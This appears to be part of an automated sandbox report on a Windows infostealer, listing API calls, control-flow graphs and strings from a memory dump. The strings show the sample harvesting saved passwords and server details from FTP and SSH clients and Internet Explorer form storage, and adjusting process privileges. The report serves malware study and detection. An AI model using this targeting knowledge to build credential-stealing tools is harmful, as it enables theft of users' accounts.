                                        • LocalFree.KERNEL32(00000000), ref: 0040A695
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                                        • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                        • API String ID: 1926481713-2450551051
                                        • Opcode ID: e958c0aea493e5eddb307e64e26a3586fc31f98df807a3997f4f368b23dff2c4
                                        • Instruction ID: 0cb8d621f53b29ec052e054c22cd4baab442041cd02d1256790fbd51bdebe987
                                        • Opcode Fuzzy Hash: e958c0aea493e5eddb307e64e26a3586fc31f98df807a3997f4f368b23dff2c4
                                        • Instruction Fuzzy Hash: F6414A72C10218EADF11AFE4DC45AEEBBB9FF08304F14413AF910B51A1D7B98A61CB59
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00405093
                                        • lstrcmpiA.KERNEL32(00414FF5,?), ref: 004050C2
                                        • lstrcmpiA.KERNEL32(00414FF7,?), ref: 004050DC
                                        • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 00405134
                                        • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00405147
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                        • String ID: \*.*
                                        • API String ID: 3663067366-1173974218
                                        • Opcode ID: f496bd943bc3c47b49bd0d4a583694d55068539748a5df07dfc16f6799754d22
                                        • Instruction ID: 432d0d56760ca5de6f9fe85ad1cca2bf93620fddfe304d64f4a8df4e7be6484c
                                        • Opcode Fuzzy Hash: f496bd943bc3c47b49bd0d4a583694d55068539748a5df07dfc16f6799754d22
                                        • Instruction Fuzzy Hash: FE31FC71900219AAEF20AF61CC42BEE77A9EF04308F4044BBB508B51E1DB789FD19E59
                                        APIs
                                        • CoCreateInstance.OLE32(00416330,00000000,00000005,00416340,?), ref: 0040A6C7
                                        • StrStrIW.SHLWAPI(00000000,00416360), ref: 0040A73E
                                        • CoTaskMemFree.OLE32(00000000,00000000,00416360), ref: 0040A769
                                        • CoTaskMemFree.OLE32(00000000,00000000,00000000,00416360), ref: 0040A777
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeTask$CreateInstance
                                        • String ID: (
                                        • API String ID: 2903366249-3887548279
                                        • Opcode ID: cf4af6e450072bda27d8eb8c0dcc654f2adcb1636fba8c51e80148cb01ae3a5f
                                        • Instruction ID: 9b2b970a26be7413fbdebaae74da64e154ca195d74620a74edb3d1aa85bf45fb
                                        • Opcode Fuzzy Hash: cf4af6e450072bda27d8eb8c0dcc654f2adcb1636fba8c51e80148cb01ae3a5f
                                        • Instruction Fuzzy Hash: 3221F834900209EBDF11DFA0D885BDEFB75BF08314F208166E500B62A0D379DAD5DB59
                                        APIs
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004027EA
                                        • GetCurrentProcess.KERNEL32 ref: 004027F4
                                        • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 00402802
                                        • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00402844
                                        • CloseHandle.KERNEL32(00000000), ref: 00402858
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                        • String ID:
                                        • API String ID: 3038321057-0
                                        • Opcode ID: 8a87f10effa025ea0952635582e6263188028a87954e1098c891bbefb2cdc491
                                        • Instruction ID: d0732b3ce1a9884d38cfc08aa7fff178398c2cfc74c669cded003c697c090c44
                                        • Opcode Fuzzy Hash: 8a87f10effa025ea0952635582e6263188028a87954e1098c891bbefb2cdc491
                                        • Instruction Fuzzy Hash: E9114976904209EBEB119F90DD4ABEE7BB4BB04308F108236A511B51E0D7F89684CB18
                                        APIs
                                        • OleInitialize.OLE32 ref: 0041022F
                                        • GetUserNameA.ADVAPI32(?,00000101), ref: 0041027F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InitializeNameUser
                                        • String ID: cryptimplus
                                        • API String ID: 2272643758-1201002197
                                        • Opcode ID: ae5fffb11fa174592083609ee6d8b77875809dff13fe16c676484707b46aa988
                                        • Instruction ID: de2264e6b524b9cc1730f11e3bc31deda8a90ce8ab6b33d2c2c52cc9d8090a6b
                                        • Opcode Fuzzy Hash: ae5fffb11fa174592083609ee6d8b77875809dff13fe16c676484707b46aa988
                                        • Instruction Fuzzy Hash: 66F03A3164420459DB50BBF29946AC839A06B8434CB10443FB814B41E2DEFC8984EA3D
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 004102E3
                                        • RevertToSelf.ADVAPI32 ref: 0041030E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterRevertSelfUnhandled
                                        • String ID:
                                        • API String ID: 669012916-0
                                        • Opcode ID: afaa296a82b58b36c6ae3d8f4d38a9aa9e9d577753efcfdca12b9ecf39618529
                                        • Instruction ID: d946ec2cc30a1461e8b9b859812147d941513197c057a0f40135f9741d7cd52e
                                        • Opcode Fuzzy Hash: afaa296a82b58b36c6ae3d8f4d38a9aa9e9d577753efcfdca12b9ecf39618529
                                        • Instruction Fuzzy Hash: 18D017740080458ADB317BF2E80A3D93A60AB8930CF44807FA448585A3CFFD04CACA3F
                                        APIs
                                          • Part of subcall function 00403711: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403756
                                        • recv.WSOCK32(?,?,00000001,00000000), ref: 004037A3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: recvselect
                                        • String ID:
                                        • API String ID: 741273618-0
                                        • Opcode ID: 72d6c01577f877d3388fded3622fc8768e6356803e80fed206270bce51e8d8c4
                                        • Instruction ID: 36e3ef43c85e50d9de3c0b06458be73d01a7fe9bd21fe244589f68d1cd890585
                                        • Opcode Fuzzy Hash: 72d6c01577f877d3388fded3622fc8768e6356803e80fed206270bce51e8d8c4
                                        • Instruction Fuzzy Hash: 840171F034420ABFEB119E50CC81B9A3F6DAB01346F108237BA01BB1D1D775EE558759

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00405885
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004058B5
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                        • API String ID: 1332880857-44262141
                                        • Opcode ID: 37c1d9e9603adf99b3d5d725068e223653ef99deb5552346cd2aafc7851fd5fc
                                        • Instruction ID: 9f48b2b2f5aff50924b22c0508edfea90403cdf3429f556b955db6b4d9db3edf
                                        • Opcode Fuzzy Hash: 37c1d9e9603adf99b3d5d725068e223653ef99deb5552346cd2aafc7851fd5fc
                                        • Instruction Fuzzy Hash: F1211B31A80A08FADB116E50CC42FDE7B67AB94708F60C567B518740E5DABD5BD0AF8C

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00401F6D
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401FAD
                                        • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402060
                                        • lstrlenA.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402099
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004020D0
                                        • GetHGlobalFromStream.OLE32(?,?,?,?), ref: 004020FC
                                        • GlobalLock.KERNEL32(?), ref: 0040212C
                                        • GlobalUnlock.KERNEL32(?), ref: 0040214B
                                        • GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 0040215D
                                        • GlobalLock.KERNEL32(?), ref: 0040218D
                                        • GlobalUnlock.KERNEL32(?), ref: 004021AC
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                                        • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                        • API String ID: 4234118056-981893429
                                        • Opcode ID: 8beeff98deecc092747b9efb06124f816e0c93c1a610c12b7f7d19e03ac6f2bc
                                        • Instruction ID: 15f42499c566025621d8331c6036e960131b545883233b226f170f05142028a8
                                        • Opcode Fuzzy Hash: 8beeff98deecc092747b9efb06124f816e0c93c1a610c12b7f7d19e03ac6f2bc
                                        • Instruction Fuzzy Hash: DD613E758001A8BADB31BB21CD42BEA7679AB44344F1044FBB648B11E1D7BD5FC4AE68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 326 402a46-402a55 327 402a57 326->327 328 402a58-402a60 326->328 329 402a62-402a69 328->329 330 402a74-402a78 328->330 329->330 331 402a6b-402a72 329->331 331->330 332 402a79-402a8f GetCurrentProcess OpenProcessToken 331->332 333 402b25-402b29 332->333 334 402a95-402ab1 GetTokenInformation 332->334 335 402ab3-402abb GetLastError 334->335 336 402b1d-402b20 CloseHandle 334->336 335->336 337 402abd-402ac1 335->337 336->333 337->336 338 402ac3-402ae5 call 4018b7 GetTokenInformation 337->338 341 402b15-402b18 call 4018a0 338->341 342 402ae7-402af9 ConvertSidToStringSidA 338->342 341->336 342->341 344 402afb-402b0a lstrcmpA 342->344 345 402b0c 344->345 346 402b0d-402b10 LocalFree 344->346 345->346 346->341
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: S-1-5-18
                                        • API String ID: 0-4289277601
                                        • Opcode ID: 507e99352afb5b2641655df89ce7b2cc2547c45d20bc9c59a8cf25a70d54eb6a
                                        • Instruction ID: 3360d111c81ebcf6c67bf3a53238a8ab977efa88f5f40edca8934fe4e0a5cfb5
                                        • Opcode Fuzzy Hash: 507e99352afb5b2641655df89ce7b2cc2547c45d20bc9c59a8cf25a70d54eb6a
                                        • Instruction Fuzzy Hash: 79212F71A00109AFDF21AFA0DD8ABEE7B75FB40704F504577A410F51E5DBB9AA80CB18

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 347 4064d0-4064ed RegOpenKeyA 348 406752-406753 347->348 349 4064f3 347->349 350 4064fa-406521 RegEnumKeyExA 349->350 351 406523-40674d RegCloseKey 350->351 352 406528-4065e6 call 401c3f call 401c93 call 401bb8 * 5 350->352 351->348 368 4065e8-4065ef 352->368 369 4065fb 352->369 368->369 370 4065f1-4065f9 368->370 371 406605-40662a call 4018a0 call 401bb8 369->371 370->371 376 40662c-406633 371->376 377 40663f 371->377 376->377 378 406635-40663d 376->378 379 406649-406656 call 4018a0 377->379 378->379 382 406697-40669e 379->382 383 406658-40665f 379->383 384 4066a0-4066a7 382->384 385 40670b-406745 call 4018a0 * 5 382->385 383->382 386 406661-406677 call 40421d 383->386 384->385 389 4066a9-4066b0 384->389 385->350 393 406682-40668d call 4018a0 386->393 394 406679-406680 386->394 389->385 392 4066b2-406706 call 401551 call 4015b3 * 2 call 401587 call 401551 call 4015b3 389->392 392->385 393->382 394->382 394->393
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 004064E6
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040651A
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040674D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                                        • API String ID: 1332880857-4069465341
                                        • Opcode ID: 4313b75cfc96e529fc553892e8b380622a8d0d93476fb3806691a936edbb6d7d
                                        • Instruction ID: d83463a765403df5e535637fa98480749d8d72bfa76fab91d0f6161c0d13a968
                                        • Opcode Fuzzy Hash: 4313b75cfc96e529fc553892e8b380622a8d0d93476fb3806691a936edbb6d7d
                                        • Instruction Fuzzy Hash: BB51E53180011CEADF216B51CC41BEDBAB9BF44304F10C0FAB589741A1CB7A5BA5EF98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 416 40ce9d-40ceb7 RegOpenKeyA 417 40d0f2-40d0f3 416->417 418 40cebd 416->418 419 40cec4-40ceeb RegEnumKeyExA 418->419 420 40cef2-40cf89 call 401c3f * 2 call 4018a0 call 401bb8 * 4 419->420 421 40ceed-40d0ed RegCloseKey 419->421 437 40cfa4-40cfa6 420->437 438 40cf8b-40cf92 420->438 421->417 440 40cfa8-40cfa9 call 4018a0 437->440 441 40cfae 437->441 438->437 439 40cf94-40cfa2 call 4018a0 438->439 444 40cfb8-40cff5 call 401bb8 * 2 439->444 440->441 441->444 450 40cffb-40d011 call 40421d 444->450 451 40d08f-40d0e5 call 4018a0 * 5 call 40ce9d call 4018a0 444->451 450->451 456 40d013-40d017 450->456 451->419 456->451 458 40d019-40d020 456->458 458->451 460 40d022-40d029 458->460 460->451 462 40d02b-40d08a call 401551 call 4015b3 * 2 call 401587 call 401551 call 4015b3 * 2 460->462 462->451
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040CEB0
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040CEE4
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D0ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                                        • API String ID: 1332880857-2649023343
                                        • Opcode ID: 68ee43048ec011c15c6e5167774f9730bdbe3fb483a677f948d462c853689766
                                        • Instruction ID: de48f3cf1203ecee9757a8e4ad920ee784aa0c90b84baed0ac799ee5886245e8
                                        • Opcode Fuzzy Hash: 68ee43048ec011c15c6e5167774f9730bdbe3fb483a677f948d462c853689766
                                        • Instruction Fuzzy Hash: F651C631900118FADF216B61CC42BDDBABABF04344F54C1BAB548740B1DB7A9B91AF99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 485 4079f4-407a0e RegOpenKeyA 486 407a14 485->486 487 407c56-407c57 485->487 488 407a1b-407a42 RegEnumKeyExA 486->488 489 407a44-407c51 RegCloseKey 488->489 490 407a49-407afc call 401c3f * 2 call 4018a0 call 401bb8 * 5 488->490 489->487 508 407b17-407b19 490->508 509 407afe-407b05 490->509 510 407b21 508->510 511 407b1b-407b1c call 4018a0 508->511 509->508 512 407b07-407b15 call 4018a0 509->512 514 407b2b-407b52 call 401bb8 510->514 511->510 512->514 519 407bf3-407c49 call 4018a0 * 5 call 4079f4 call 4018a0 514->519 520 407b58-407b5f 514->520 519->488 520->519 521 407b65-407b6c 520->521 521->519 523 407b72-407bcc call 401551 call 4015b3 * 3 call 401551 call 4015b3 521->523 549 407be9-407bee call 401551 523->549 550 407bce-407bd5 523->550 549->519 550->549 551 407bd7-407be7 call 401551 550->551 551->519
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407A07
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A3B
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                        • API String ID: 1332880857-3874328862
                                        • Opcode ID: b3ae5fa0137a43e6c3acca1794bdfaa13e7c7035e9cac5ffd845bd55192dcfe0
                                        • Instruction ID: 6ba95fd970e938fcab2c26ca14cdf170eeafc08718ad228059479bab44013bc4
                                        • Opcode Fuzzy Hash: b3ae5fa0137a43e6c3acca1794bdfaa13e7c7035e9cac5ffd845bd55192dcfe0
                                        • Instruction Fuzzy Hash: CD51D33190011CBADF216F51CC42BDD7ABABF44308F50C1BAB548751A1DB7AAB91AF89

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DAA0
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DAD4
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCBD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                                        • API String ID: 1332880857-3620412361
                                        • Opcode ID: 525be7967cdf949b2b4fe62e06db19f4aa65a3c630158b24c30b162ab2062eaf
                                        • Instruction ID: 35c8621cfcc2f8450d45fb2bc6be30e8d99e81c950d52ea4d39d537080795974
                                        • Opcode Fuzzy Hash: 525be7967cdf949b2b4fe62e06db19f4aa65a3c630158b24c30b162ab2062eaf
                                        • Instruction Fuzzy Hash: 3B519631900118FADF626F51CC42BDD7AB6BF04304F5085BAB548741B1DBBA9BA59FC8

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407D59
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407D8D
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                                        • API String ID: 1332880857-2128033141
                                        • Opcode ID: 499a83b9ee0d19bae6b4d4a67f559f60542ea790b3aedc78fc2aed282f5518e8
                                        • Instruction ID: ed5aa321c4a7382c56c9ed296d4768114fa0973e83d11c553023a5e170f729af
                                        • Opcode Fuzzy Hash: 499a83b9ee0d19bae6b4d4a67f559f60542ea790b3aedc78fc2aed282f5518e8
                                        • Instruction Fuzzy Hash: 8651A33184011CBADF226F51CC42BEC7ABABF04304F50C5BAB558741B1DB7A5BA1AF89

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 674 402524-402546 RegCreateKeyA 675 402548-40255f RegSetValueExA 674->675 676 40256a-40256c 674->676 677 402561 675->677 678 402562-402565 RegCloseKey 675->678 679 402572-402585 GetTempPathA 676->679 680 402637-40263b 676->680 677->678 678->676 679->680 681 40258b-402590 679->681 681->680 682 402596-4025b2 CreateDirectoryA call 4023f0 681->682 685 4025d0-4025da call 401c3f 682->685 686 4025b4-4025ce call 401c3f call 401c93 682->686 690 4025df-402603 CreateFileA 685->690 686->690 692 402605-402618 call 40140a CloseHandle 690->692 693 40261d-40261f 690->693 692->693 696 402621-402627 DeleteFileA 693->696 697 40262c-402632 call 4018a0 693->697 696->697 697->680
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 0040253F
                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402558
                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 00402565
                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040257E
                                        • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 0040259F
                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004025FA
                                        • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402618
                                        • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402627
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
                                        • String ID: Software\WinRAR
                                        • API String ID: 3443402316-224198155
                                        • Opcode ID: 66d1b11641d647b5ce2a525391feea64acc522b9e6822cfa81a9fc4e8aafade5
                                        • Instruction ID: 6904ef1b2772d710c1d8bf12838b52ee9381b0c06debd4c8e703c90749263143
                                        • Opcode Fuzzy Hash: 66d1b11641d647b5ce2a525391feea64acc522b9e6822cfa81a9fc4e8aafade5
                                        • Instruction Fuzzy Hash: C4217F7190020DBBEF21BFA1CD46FDE7A69AB10748F10047AB604B50E1D6FA9BD09B1C

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E847
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E87B
                                        • GetPrivateProfileStringA.KERNEL32(Program,DataPath,004148B8,?,00000104,00000000), ref: 0040E901
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E95A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                                        • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                                        • API String ID: 1343824468-2495907966
                                        • Opcode ID: 07d445bfdfa8761b4962d96e49eecba8f4178bdcbcf5bc8d6308a944531efd02
                                        • Instruction ID: 64361b49ab85cc2657c0af7d94bcaecc0f4019614862639bf0536436395d07b8
                                        • Opcode Fuzzy Hash: 07d445bfdfa8761b4962d96e49eecba8f4178bdcbcf5bc8d6308a944531efd02
                                        • Instruction Fuzzy Hash: 8D31F87194020CBAEF61BB51CC42FDD7ABABF14304F10C4BBB544B50E1CAB95AA19F99

                                        Control-flow Graph

                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404EB0
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                          • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                          • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,004148B8,?,00000104,?), ref: 00404F00
                                        • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,004148B8,?,00000104,?), ref: 00404F3B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                                        • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                                        • API String ID: 2508676433-45949541
                                        • Opcode ID: 0affe33e2018649f64b0b97f7b29bc4be182e6ecc69700ed5e3dde3a7c24470b
                                        • Instruction ID: 20e4cbabcb38d3a8dbf79de88f3cded1c9f2a6ba63dff5cad0e01ff50808c984
                                        • Opcode Fuzzy Hash: 0affe33e2018649f64b0b97f7b29bc4be182e6ecc69700ed5e3dde3a7c24470b
                                        • Instruction Fuzzy Hash: F3213671A80208BEEB11BB61CC43FDD7A69AB84744F500077B748F51E2DBF99AC09A5D
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00406254
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406288
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406496
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: Host$Port$PthR$SSH$User
                                        • API String ID: 1332880857-1643752846
